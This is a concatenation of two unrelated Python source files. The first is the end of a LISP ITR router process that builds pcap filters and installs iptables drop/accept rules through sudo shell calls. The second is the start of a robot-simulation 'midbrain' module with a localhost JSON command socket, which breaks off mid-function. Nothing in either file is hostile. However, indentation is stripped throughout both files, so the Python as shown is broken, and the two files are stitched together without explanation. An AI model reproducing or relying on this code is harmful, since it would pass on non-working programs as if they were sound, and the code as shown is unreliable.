packet.outer_version = version
source_rloc = lisp.lisp_myrlocs[0] if (version == 4) else \
lisp.lisp_myrlocs[1]
packet.outer_source.copy_address(source_rloc)
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet) == False): return
#endif
if (packet.encode(None) == None): return
#
# Replicate out on raw socket.
#
packet.print_packet("Replicate-to-L{}".format(node.level), True)
packet.send_packet(lisp_raw_socket, packet.outer_dest)
#
# We need to strip the encapsulation header so we can add a new
# one for the next replication.
#
strip_len = len(packet.packet) - orig_len
packet.packet = packet.packet[strip_len::]
#endfor
#endif
#
# Don't need packet structure anymore.
#
del(packet)
return
#enddef
#
# lisp_itr_pcap_process_packet
#
# Receive LISP encapsulated packet from pcap.loop().
#
def lisp_itr_pcap_process_packet(device, not_used, packet):
offset = 4 if device == "lo0" else 0 if device == "lispers.net" else 14
if (lisp.lisp_frame_logging):
title = lisp.bold("Received frame on interface '{}'".format(device),
False)
frame = lisp.lisp_format_packet(packet[0:64])
lisp.lprint("{}: {}".format(title, frame))
#endif
#
# Get input interface based on source MAC address.
#
macs = ""
my_sa = False
interface = device
if (offset == 14):
interfaces, sa, da, my_sa = lisp.lisp_get_input_interface(packet)
interface = device if (device in interfaces) else interfaces[0]
macs = lisp.lisp_format_macs(sa, da)
if (interface.find("vlan") != -1): offset +=4
#
# If destination MAC address is multicast, set my_sa. Examine low-order
# bit of first byte by grabbing the second nibble and testing low-order
# bit after converting to integer.
#
if (int(da[1], 16) & 1): my_sa = True
#endif
#
# Check for VLAN encapsulation.
#
if (offset != 0):
ethertype = struct.unpack("H", packet[offset-2:offset])[0]
ethertype = socket.ntohs(ethertype)
if (ethertype == 0x8100):
vlan = struct.unpack("I", packet[offset:offset+4])[0]
vlan = socket.ntohl(vlan)
interface = "vlan" + str(vlan >> 16)
offset += 4
elif (ethertype == 0x806):
lisp.dprint("Dropping ARP packets, host should have default route")
return
#endif
#endif
if (lisp.lisp_l2_overlay): offset = 0
lisp_itr_data_plane(packet[offset::], device, interface, macs, my_sa)
return
#enddef
#
# lisp_itr_kernel_filter
#
# Supplied 'sources' array are the EID-prefixes we want the kernel to drop
# packets for. We will use iptables for Linux and ipfw for MacOS.
#
# We need this address combination support (notation S -> D):
#
# site-EID -> remote-EID processed by ITR
# site-EID -> non-EID processed by ITR
# site-EID -> site-EID processed by kernel
# non-EID -> non-EID processed by kernel
# non-EID -> remote-EID processed by kernel
# non-EID -> site-EID processed by kernel
#
# The pcap filters reflect the ITR processing combos and can be found in
# lisp_itr_build_pcap_filter(). This routine programs iptables to do the
# kernel processing combos.
#
# (1) iptables -t raw -A lisp -j ACCEPT -d <special-addresses>
# (2) iptables -t raw -A lisp -j ACCEPT -d <local-address> ...
# (3) iptables -t raw -A lisp -j ACCEPT -s <site-eid> -d <site-eid> ...
# (4) iptables -t raw -A lisp -j DROP -s <site-eid> ...
#
# (1) and (2), we want kernel to route packets. This allows loopback and
# multicast to be processed by kernel.
#
# For (3), we want the kernel to do local routing of packets inside of a site
# in this ITR.
#
# For (4), we want kernel to not touch any packets sourced from locally
# configured EIDs. That is each EID-prefix from a "lisp database-mapping"
# command. Because those EID-prefixes are pcap'ed and processed by the lisp-itr
# process.
#
def lisp_itr_kernel_filter(sources, dyn_eids):
if (os.getenv("LISP_NO_IPTABLES") != None):
lisp.lprint("User selected to suppress installing iptables rules")
return
#endif
os.system("sudo iptables -t raw -N lisp")
os.system("sudo iptables -t raw -A PREROUTING -j lisp")
os.system("sudo ip6tables -t raw -N lisp")
os.system("sudo ip6tables -t raw -A PREROUTING -j lisp")
#
# Have kernel process packets for local addresses when sourced from site
# EIDs. We do not want the lisp-itr process to process such packets.
# We want the kernel to deliver packets to and from local applications.
# And we want the kernel to forward decapsulated packets out interfaces
# leading the EIDs.
#
add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -d {}"
addr_set = ["127.0.0.1", "::1", "224.0.0.0/4 -p igmp", "ff00::/8",
"fe80::/16"]
addr_set += sources + lisp.lisp_get_all_addresses()
for addr in addr_set:
if (lisp.lisp_is_mac_string(addr)): continue
six = "" if addr.find(":") == -1 else "6"
os.system(add.format(six, addr))
#endfor
#
# When source and destination addresses are EIDs for this LISP site,
# we want the kernel to do local routing. But as a PITR, we don't want
# the kernel to route everything (EID-prefix 0.0.0.0/0) or we can't have
# this process encapsulate for any source address to a destination EID.
#
if (lisp.lisp_pitr == False):
add = "sudo ip{}tables -t raw -A lisp -j ACCEPT -s {} -d {}"
check = "sudo ip{}tables -t raw -C lisp -j ACCEPT -s {} -d {}"
for source in sources:
if (lisp.lisp_is_mac_string(source)): continue
if (source in dyn_eids): continue
six = "" if source.find(":") == -1 else "6"
for s in sources:
if (lisp.lisp_is_mac_string(s)): continue
if (s in dyn_eids): continue
if (s.find(".") != -1 and source.find(".") == -1): continue
if (s.find(":") != -1 and source.find(":") == -1): continue
if (commands.getoutput(check.format(six, source, s)) == ""):
continue
#endif
os.system(add.format(six, source, s))
#endfor
#endfor
#endif
#
# Now put in drop rules for each "lisp database-mapping" EID-prefix.
#
drop = "sudo ip{}tables -t raw -A lisp -j DROP -s {}"
for source in sources:
if (lisp.lisp_is_mac_string(source)): continue
six = "" if source.find(":") == -1 else "6"
os.system(drop.format(six, source))
    #endfor
#
# Print out rules we just configured.
#
rules = commands.getoutput("sudo iptables -t raw -S lisp").split("\n")
rules += commands.getoutput("sudo ip6tables -t raw -S lisp").split("\n")
lisp.lprint("Using kernel filters: {}".format(rules))
#
    # Check if we need to put in an iptables rule workaround for the virtio
    # TCP checksum corruption problem for KVM guest OSes. Check the
    # environment variable LISP_VIRTIO_BUG.
#
# Note a debian host system that runs docker will need the following
# command so ip6tables works inside of the docker container:
#
# sudo modprobe ip6table_filter
#
if (os.getenv("LISP_VIRTIO_BUG") != None):
c = ("sudo iptables -A POSTROUTING -t mangle -p tcp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo iptables -A POSTROUTING -t mangle -p udp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo ip6tables -A POSTROUTING -t mangle -p tcp -j " + \
"CHECKSUM --checksum-fill; ")
c += ("sudo ip6tables -A POSTROUTING -t mangle -p udp -j " + \
"CHECKSUM --checksum-fill")
os.system(c)
virtio = lisp.bold("virtio", False)
lisp.lprint("{} bug workaround, configure '{}'".format(virtio, c))
#endif
return
#enddef
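#
# For illustration only: with a single hypothetical site EID-prefix of
# 10.1.0.0/16 and one local RLOC of 192.168.1.2, the rules installed above
# would look roughly like:
#
#   iptables -t raw -A lisp -j ACCEPT -d 127.0.0.1
#   iptables -t raw -A lisp -j ACCEPT -d 224.0.0.0/4 -p igmp
#   iptables -t raw -A lisp -j ACCEPT -d 10.1.0.0/16
#   iptables -t raw -A lisp -j ACCEPT -d 192.168.1.2
#   iptables -t raw -A lisp -j ACCEPT -s 10.1.0.0/16 -d 10.1.0.0/16
#   iptables -t raw -A lisp -j DROP -s 10.1.0.0/16
#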
#
# lisp_itr_build_pcap_filter
#
# Build pcap filter and return string to caller.
#
def lisp_itr_build_pcap_filter(sources, dyn_eids, l2_overlay, pitr):
if (l2_overlay):
pfilter = "ether[6:4] >= 0 and ether[10:2] >= 0"
lisp.lprint("Using pcap filter: '{}'".format(pfilter))
return(pfilter)
#endif
ether_pfilter = "(not ether proto 0x806)"
probe_pfilter = " or (udp src port 4342 and ip[28] == 0x28)"
decent_pfilter = \
" or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)"
src_pfilter = ""
dst_pfilter = ""
for source in sources:
insert_source = source
if (lisp.lisp_is_mac_string(source)):
insert_source = source.split("/")[0]
insert_source = insert_source.replace("-", "")
mac_str = []
for i in range(0, 12, 2): mac_str.append(insert_source[i:i+2])
insert_source = "ether host " + ":".join(mac_str)
#endif
src_pfilter += "{}".format(insert_source)
if (source not in dyn_eids): dst_pfilter += "{}".format(insert_source)
if (sources[-1] == source): break
src_pfilter += " or "
if (source not in dyn_eids): dst_pfilter += " or "
#endfor
if (dst_pfilter[-4::] == " or "): dst_pfilter = dst_pfilter[0:-4]
#
# If "lisp-nat = yes" is configured, then we are a PETR and we need
# to accept packets for local EIDs (assigned to loopback interfaces).
# So allow the first one to be accepted.
#
lisp_nat = commands.getoutput("egrep 'lisp-nat = yes' ./lisp.config")
lisp_nat = (lisp_nat != "" and lisp_nat[0] == " ")
loopback = lisp.lisp_get_loopback_address() if (lisp_nat) else None
addr_pfilter = ""
addresses = lisp.lisp_get_all_addresses()
for addr in addresses:
if (addr == loopback): continue
addr_pfilter += "{}".format(addr)
if (addresses[-1] == addr): break
addr_pfilter += " or "
    #endfor
if (src_pfilter != ""):
src_pfilter = " and (src net {})".format(src_pfilter)
#endif
if (dst_pfilter != ""):
dst_pfilter = " and not (dst net {})".format(dst_pfilter)
#endif
if (addr_pfilter != ""):
addr_pfilter = " and not (dst host {})".format(addr_pfilter)
#endif
#
# A PITR wants to see packets from anywhere so it can encap to possible
# LISP sites. But we want the kernel to route and consume for RLOCs for
# this system.
#
if (pitr):
dst_pfilter = ""
addr_pfilter = addr_pfilter.replace("dst ", "")
#endif
#
# Concatenate all the filters.
#
pfilter = ether_pfilter + src_pfilter + dst_pfilter + addr_pfilter
pfilter += probe_pfilter
pfilter += decent_pfilter
lisp.lprint("Using pcap filter: '{}'".format(pfilter))
return(pfilter)
#enddef
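#
# For illustration only: with a single hypothetical source EID-prefix of
# 10.1.0.0/16, no dynamic-EIDs, and one local address 192.168.1.2, the
# function above builds a filter along the lines of:
#
#   (not ether proto 0x806) and (src net 10.1.0.0/16)
#       and not (dst net 10.1.0.0/16) and not (dst host 192.168.1.2)
#       or (udp src port 4342 and ip[28] == 0x28)
#       or (ip[16] >= 224 and ip[16] < 240 and (ip[28] & 0xf0) == 0x30)
#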
#
# lisp_itr_pcap_thread
#
# Receive LISP encapsulated packet from pcap.
#
def lisp_itr_pcap_thread(device, pfilter, pcap_lock):
lisp.lisp_set_exception()
pcap_lock.acquire()
pcap = pcappy.open_live(device, 9000, 0, 100)
pcap_lock.release()
pcap.filter = pfilter
pcap.loop(-1, lisp_itr_pcap_process_packet, device)
return
#enddef
#
# lisp_itr_process_info_timer
#
# Time to send a periodic Info-Request message. This must be done at an
# interval less than the periodic Map-Register interval and less than the NAT
# timeout value, which is usually one minute.
#
def lisp_itr_process_info_timer():
global lisp_itr_info_timer
global lisp_ephem_nat_socket
global lisp_send_sockets
lisp.lisp_set_exception()
#
# Build Info-Request messages if we have any private RLOCs in database-
# mappings.
#
sockets = [lisp_ephem_nat_socket, lisp_ephem_nat_socket,
lisp_ipc_listen_socket]
lisp.lisp_build_info_requests(sockets, None, lisp.LISP_CTRL_PORT)
#
# Restart periodic timer.
#
lisp_itr_info_timer.cancel()
lisp_itr_info_timer = threading.Timer(lisp.LISP_INFO_INTERVAL,
lisp_itr_process_info_timer, [])
lisp_itr_info_timer.start()
return
#enddef
#
# lisp_itr_map_resolver_command
#
# Call lispconfig.lisp_map_resolver_command and set "test-mr" timer.
#
def lisp_itr_map_resolver_command(kv_pair):
global lisp_send_sockets
global lisp_ephem_port
global lisp_itr_info_timer
lispconfig.lisp_map_resolver_command(kv_pair)
if (lisp.lisp_test_mr_timer == None or
lisp.lisp_test_mr_timer.is_alive() == False):
lisp.lisp_test_mr_timer = threading.Timer(2, lisp.lisp_test_mr,
[lisp_send_sockets, lisp_ephem_port])
lisp.lisp_test_mr_timer.start()
#endif
#
# Trigger a Info-Request if we are doing NAT-traversal.
#
lisp_itr_info_timer = threading.Timer(0, lisp_itr_process_info_timer, [])
lisp_itr_info_timer.start()
return
#enddef
#
# lisp_itr_database_mapping_command
#
# Add database-mapping entry so ITR can packet capture on packets only from
# sources from the *first* database-mapping configured.
#
def lisp_itr_database_mapping_command(kv_pair):
lispconfig.lisp_database_mapping_command(kv_pair)
return
#enddef
#
# lisp_itr_xtr_command
#
# Call lispconfig.lisp_xtr_command() but pass socket parameters to starting
# the RLOC-probing timer if "rloc-probing = yes".
#
def lisp_itr_xtr_command(kv_pair):
global lisp_ephem_listen_socket
#
# Cache current state for nat-traversal and rloc-probing so we know if
# we should trigger..
#
nat_traversal = lisp.lisp_nat_traversal
rloc_probing = lisp.lisp_rloc_probing
#
# Execute command.
#
lispconfig.lisp_xtr_command(kv_pair)
#
# Did "nat-traversal = yes" or "rloc-probing = yes" just happen?
#
nat_now_on = (nat_traversal == False and lisp.lisp_nat_traversal and \
lisp.lisp_rloc_probing)
rloc_probing_now_on = (rloc_probing == False and lisp.lisp_rloc_probing)
interval = 0
if (rloc_probing_now_on): interval = 1
if (nat_now_on): interval = 5
if (interval != 0):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
lisp.lisp_start_rloc_probe_timer(interval, lisp_sockets)
#endif
#
# If nat-traversal=yes and data-plane-security=yes on an ITR, then we
    # need to set the source port in RLOC-probe requests and encapsulated data
# packets to be the same value.
#
if (lisp.lisp_crypto_ephem_port == None and lisp.lisp_data_plane_security):
port = lisp_ephem_listen_socket.getsockname()[1]
lisp.lisp_crypto_ephem_port = port
lisp.lprint("Use port {} for lisp-crypto packets".format(port))
entry = { "type" : "itr-crypto-port", "port" : port }
lisp.lisp_write_to_dp_socket(entry)
#endif
#
# Write to external data-plane if enabled.
#
lisp.lisp_ipc_write_xtr_parameters(lisp.lisp_debug_logging,
lisp.lisp_data_plane_logging)
return
#enddef
#
# lisp_itr_process_nonce_ipc
#
# Process a nonce IPC message from the ETR. It wants to tell us that a
# request-nonce was received and we need to echo it or when this ITR requested
# a nonce to be echoed, the ETR is telling us it has been echoed.
#
def lisp_itr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
#
# If we are in request-nonce mode, exit it, so we can echo the nonce the
# other side is requesting.
#
if (opcode == "R"):
echo_nonce.request_nonce_rcvd = nonce
echo_nonce.last_request_nonce_rcvd = lisp.lisp_get_timestamp()
echo_nonce.echo_nonce_sent = nonce
echo_nonce.last_new_echo_nonce_sent = lisp.lisp_get_timestamp()
lisp.lprint("Start echo-nonce mode for {}, nonce 0x{}".format( \
lisp.red(echo_nonce.rloc_str, False), lisp.lisp_hex_string(nonce)))
#endif
if (opcode == "E"):
echo_nonce.echo_nonce_rcvd = nonce
echo_nonce.last_echo_nonce_rcvd = lisp.lisp_get_timestamp()
if (echo_nonce.request_nonce_sent == nonce):
en = lisp.bold("echoed nonce", False)
lisp.lprint("Received {} {} from {}".format(en,
lisp.lisp_hex_string(nonce),
lisp.red(echo_nonce.rloc_str, False)))
echo_nonce.request_nonce_sent = None
lisp.lprint("Stop request-nonce mode for {}".format( \
lisp.red(echo_nonce.rloc_str, False)))
echo_nonce.last_good_echo_nonce_rcvd = lisp.lisp_get_timestamp()
else:
rns = "none"
if (echo_nonce.request_nonce_sent):
rns = lisp.lisp_hex_string(echo_nonce.request_nonce_sent)
#endif
lisp.lprint(("Received echo-nonce 0x{} from {}, but request-" + \
"nonce is {}").format(lisp.lisp_hex_string(nonce),
lisp.red(echo_nonce.rloc_str, False), rns))
#endif
#endif
return
#enddef
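#
# For illustration only: the IPC string parsed above has the form
# "nonce%<opcode>%<rloc>%<nonce-in-hex>". For example, a hypothetical
# "nonce%R%10.0.0.2%a1b2c3d4e5f6" asks this ITR to start echoing nonce
# 0xa1b2c3d4e5f6 toward RLOC 10.0.0.2.
#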
#
# ITR commands processed by this process.
#
lisp_itr_commands = {
"lisp xtr-parameters" : [lisp_itr_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"multi-tenant-eid" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-device" : [True],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-resolver" : [lisp_itr_map_resolver_command, {
"mr-name" : [True],
"ms-name" : [True],
"dns-name" : [True],
"address" : [True] }],
"lisp database-mapping" : [lisp_itr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"send-map-request" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp itr-map-cache" : [lispconfig.lisp_map_cache_command, {
"prefix" : [],
"instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"rloc" : [],
"rloc-record-name" : [True],
"rle-name" : [True],
"elp-name" : [True],
"address" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"show itr-map-cache" : [lisp_itr_show_command, { }],
"show itr-rloc-probing" : [lisp_itr_show_rloc_probe_command, { }],
"show itr-keys" : [lisp_itr_show_keys_command, {}],
"show itr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_itr_startup() == False):
lisp.lprint("lisp_itr_startup() failed")
lisp.lisp_print_banner("ITR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_listen_socket, lisp_ipc_listen_socket,
lisp_ephem_nat_socket, lisp_ipc_punt_socket]
#
# Should we listen to the map-cache/punt IPC socket if it exists.
#
listen_on_ipc_socket = True
ephem_sockets = [lisp_ephem_listen_socket] * 3
ephem_nat_sockets = [lisp_ephem_nat_socket] * 3
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Punt signal message from another data-plane (snabb).
#
if (lisp.lisp_ipc_data_plane and lisp_ipc_punt_socket in ready_list):
lisp.lisp_process_punt(lisp_ipc_punt_socket, lisp_send_sockets,
lisp_ephem_port)
#endif
#
# Process Map-Reply messages received on ephemeral port.
#
if (lisp_ephem_listen_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
continue
#endif
lisp.lisp_parse_packet(ephem_sockets, packet, source, port)
#endif
#
# Process Info-Reply messages received on NAT ephemeral port.
#
if (lisp_ephem_nat_socket in ready_list):
opcode, source, port, packet = lisp.lisp_receive(ephem_nat_sockets[0],
False)
if (source == ""): break
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe reply, using pcap")
continue
#endif
probe = lisp.lisp_parse_packet(ephem_nat_sockets, packet, source, port)
#
        # Info-Reply has a new RTR-list; RLOC-probe the RTR RLOCs so we can
        # bring up lisp-crypto faster.
#
if (probe):
lisp_sockets = [lisp_ephem_listen_socket, lisp_ephem_listen_socket]
lisp.lisp_start_rloc_probe_timer(0, lisp_sockets)
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet == "clear"):
lisp.lisp_clear_map_cache()
continue
#endif
if (packet.find("nonce%") != -1):
lisp_itr_process_nonce_ipc(packet)
continue
#endif
lispconfig.lisp_process_command(lisp_ipc_listen_socket, opcode,
packet, "lisp-itr", [lisp_itr_commands])
elif (opcode == "api"):
lisp.lisp_process_api("lisp-itr", lisp_ipc_listen_socket, packet)
elif (opcode == "data-packet"):
lisp_itr_data_plane(packet, "ipc")
else:
if (lisp.lisp_is_rloc_probe_reply(packet[0])):
lisp.lprint("ITR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_itr_shutdown()
lisp.lisp_print_banner("ITR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
midbrain.py
|
import os
import sys
import math
import time
import numpy as np
import abe_sim.brain.geom as geom
from abe_sim.brain.cerebellum import Cerebellum
from abe_sim.brain.geom import angle_diff, euler_to_quaternion, euler_diff_to_angvel, invert_quaternion, quaternion_product, quaternion_to_euler, poseFromTQ
import random
import math
import heapq
import ast
import json
import socket
import threading
import trimesh  # needed for trimesh.graph.split() in the 'shelved' arrangement code below
HOST = '127.0.0.1' # Standard loopback interface address (localhost)
PORTS = 65432 # Port to listen on (non-privileged ports are > 1023)
PORTF = 54321
from flask import Flask
from flask import request
import json
import schemasim.space.space3D as space3D
import schemasim.space.space2D as space2D
import schemasim.space.space as space
import schemasim.schemas.l0_schema_templates as st
import schemasim.schemas.l1_geometric_primitives as gp
import schemasim.schemas.l2_geometric_primitive_relations as gpr
import schemasim.objects.example_objects as eo
import schemasim.simulators.physics_simulator_2D as ps2D
import schemasim.simulators.physics_simulator_3D as ps3D
import schemasim.scene_generator as sg
from schemasim.util.geometry import fibonacci_sphere
from schemasim.schemas.l11_functional_control import Support
def simpleOnNavigationDoneCallback(x):
print("Base arrived at %s" % x)
def simpleHandsLeftPositioningDoneCallback(x):
print("Left hand arrived at %s" % x)
def simpleHandsRightPositioningDoneCallback(x):
print("Right hand arrived at %s" % x)
class Validator2DVW:
def __init__(self, collisionManager, trajector):
self.collisionManager = collisionManager
self.trajector = trajector
return
def isValid(self, coordinates):
return not self.collisionManager.in_collision_single(self.trajector, ((coordinates[0], coordinates[1], 0), (0, 0, 0, 1)))
class Validator3D:
def __init__(self, collisionManager, trajectors, space):
self.collisionManager = collisionManager
self.trajectors = trajectors
self.space = space
return
def isValid(self, coordinates):
for trajector, transform in self.trajectors:
pose = self.space.poseFromTR((transform[0][0]+coordinates[0], transform[0][1]+coordinates[1], transform[0][2]+coordinates[2]), transform[1])
if self.collisionManager.in_collision_single(trajector, pose):
return False
return True
class Midbrain:
def __init__(self, headActuator, handsActuator, baseActuator, poseSensor, worldDump, simu):
self.cerebellum = Cerebellum(headActuator, handsActuator, baseActuator, poseSensor, simu, worldDump)
self.cerebellum.initializePosition("hands/left", {"x": 0, "y": 0.4, "z": 0.96, "roll": 0, "pitch": 0, "yaw": 0})
self.cerebellum.initializePosition("hands/right", {"x": 0, "y": -0.4, "z": 0.96, "roll": 0, "pitch": 0, "yaw": 0})
self.cerebellum.initializePosition("head", {"pan": 0, "tilt": 0})
self.worldDump = worldDump
self.cellMap = None
self.collisionManager = geom.BoxCollisionManager()
self.simu = simu
self.sim2D = self.cerebellum._sim2D
self.sim3D = self.cerebellum._sim3D
self._socketThread = None
self._flaskThread = None
self._flask = Flask(__name__)
self._robotActionCondition = threading.Condition()
self._lastRequestedAction = False
def _simplifyWaypoints(self, waypoints):
retq = []
if waypoints:
ops = []
cX = waypoints[0][0]
cY = waypoints[0][1]
cA = waypoints[0][2]
for wp in waypoints[1:]:
dx = cX - wp[0]
dy = cY - wp[1]
d = math.sqrt(dx*dx + dy*dy)
da = geom.angle_diff(cA, wp[2])
if 0.001 < d:
ops.append("fwd")
elif 0.001 < da:
ops.append("a+")
elif -0.001 > da:
ops.append("a-")
cX = wp[0]
cY = wp[1]
cA = wp[2]
ops.append("end")
cOp = None
for k, op in enumerate(ops):
if None == cOp:
cOp = op
elif "end" == cOp:
coords = self.cellMap.pointId2EmbeddingCoordinates(waypoints[k])
retq.append({"x": coords[0], "y": coords[1], "yaw": coords[2]})
elif cOp != op:
coords = self.cellMap.pointId2EmbeddingCoordinates(waypoints[k])
retq.append({"x": coords[0], "y": coords[1], "yaw": coords[2]})
cOp = op
return retq
def getObjectSchemas(self):
pathPrefix = os.path.join(os.path.dirname(__file__), "../meshes")
objects = self.cerebellum._retrieveObjects()
retq = {}
for k,o in objects.items():
retq[k] = eo.MiscellaneousRigidObject(name=k, object_type=o["props"]["type"], mesh=os.path.join(pathPrefix, o["props"]["meshfile"]))
retq[k]._parameters["tx"] = o["position"]["x"]
retq[k]._parameters["ty"] = o["position"]["y"]
retq[k]._parameters["tz"] = o["position"]["z"]
retq[k]._parameters["rx"] = o["orientation"]["x"]
retq[k]._parameters["ry"] = o["orientation"]["y"]
retq[k]._parameters["rz"] = o["orientation"]["z"]
retq[k]._parameters["rw"] = o["orientation"]["w"]
retq[k]._parameters["vx"] = 0.0
retq[k]._parameters["vy"] = 0.0
retq[k]._parameters["vz"] = 0.0
retq[k]._parameters["wx"] = 0.0
retq[k]._parameters["wy"] = 0.0
retq[k]._parameters["wz"] = 0.0
return retq
def listObjects(self):
objects = self.cerebellum._retrieveObjects()
for k in sorted(objects.keys()):
props = ""
for propName in sorted(objects[k]["props"].keys()):
props = props + "\t" + propName + ": " + objects[k]["props"][propName] + "\n"
position = "\t(x: %f; y: %f; z: %f)\n" % (objects[k]["position"]["x"], objects[k]["position"]["y"], objects[k]["position"]["z"])
orientation = "\t(x: %f; y: %f; z: %f; w: %f)\n" % (objects[k]["orientation"]["x"], objects[k]["orientation"]["y"], objects[k]["orientation"]["z"], objects[k]["orientation"]["w"])
s = k+"\n"+props+position+orientation
print(s)
def updateNavigationMap(self):
objects = self.cerebellum._retrieveObjects()
self.collisionManager.clear_objects()
for k in objects.keys():
if ("furniture" in objects[k]["props"]) and objects[k]["props"]["furniture"]:
box = geom.boxFromPath(objects[k]["props"]["meshfile"])
if box:
self.collisionManager.add_object(k, box, ((objects[k]["position"]["x"], objects[k]["position"]["y"], objects[k]["position"]["z"]), (objects[k]["orientation"]["x"], objects[k]["orientation"]["y"], objects[k]["orientation"]["z"], objects[k]["orientation"]["w"])))
testBox = geom.Box()
testBox.vertices = [[-0.5, -0.5, 0], [0.5, -0.5, 0], [-0.5, 0.5, 0], [0.5, 0.5, 0], [-0.5, -0.5, 1], [0.5, -0.5, 1], [-0.5, 0.5, 1], [0.5, 0.5, 1]]
self.cellMap = space2D.Grid2DVW8(lines=10, cols=10, resolution=1, xLeft=-4.5, yDown=-4.5, gridYaw=0, validator=Validator2DVW(self.collisionManager, testBox), velocity=3, angularVelocity=3)
def _interpretSocketCommand(self, command):
opcode = ""
if 'op' in command:
opcode = command['op']
opcode = opcode.lower()
data = {}
if 'args' in command:
data = command['args']
retq = {'status': 'command not recognized', 'response': ''}
if opcode in ['hello', 'hi']:
retq['status'] = 'ok'
retq['response'] = 'hi!'
elif opcode in ['placeon']:
if ('object' in data) and ('destination' in data):
trajector = data['object']
supporter = data['destination']
objSchemas = self.getObjectSchemas()
trajSchema = objSchemas[trajector].unplace(self.sim3D)
destspec = [Support(supporter=objSchemas[supporter],supportee=trajSchema), trajSchema]
self.carryObject(trajector, destspec)
retq['status'] = 'ok'
retq['response'] = 'carrying object %s to %s' % (trajector, supporter)
else:
retq['status'] = 'insufficient parameters'
retq['response'] = 'missing object or destination'
elif opcode in ['retrieveobjects', 'ro']:
retq['status'] = 'ok'
retq['response'] = self.cerebellum._retrieveObjects()
elif opcode in ['retrieveworldstate', 'rws']:
retq['status'] = 'ok'
retq['response'] = self.cerebellum._retrieveWorldState(forJSON=True)
elif opcode in ['setworldstate', 'sws']:
retq['status'] = 'ok'
retq['response'] = ''
try:
self.cerebellum._setWorldState(data)
except KeyError:
retq['status'] = 'missing entries from state data'
return json.dumps(retq)
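    # Illustrative note (not part of the class logic): a client drives the
    # command interpreter above with a newline-terminated JSON message such as
    #   {"op": "placeon", "args": {"object": "mug", "destination": "table"}}
    # where "mug" and "table" are hypothetical object names from the world
    # dump. See the client sketch after _startSocket() below.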
def _startSocket(self):
def thread_function_socket():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORTS))
s.listen(0)
while True:
conn, addr = s.accept()
comm = ""
with conn:
while True:
data = conn.recv(1024).decode('UTF-8')
comm = comm + data
if (not data) or (data[-1] in ['\n']):
break
comm = comm.strip()
try:
res = self._interpretSocketCommand(json.loads(comm))
except SyntaxError:
res = json.dumps({'status': 'ill-formed json for command'})
conn.sendall(bytes(res, 'UTF-8'))
def thread_function_flask():
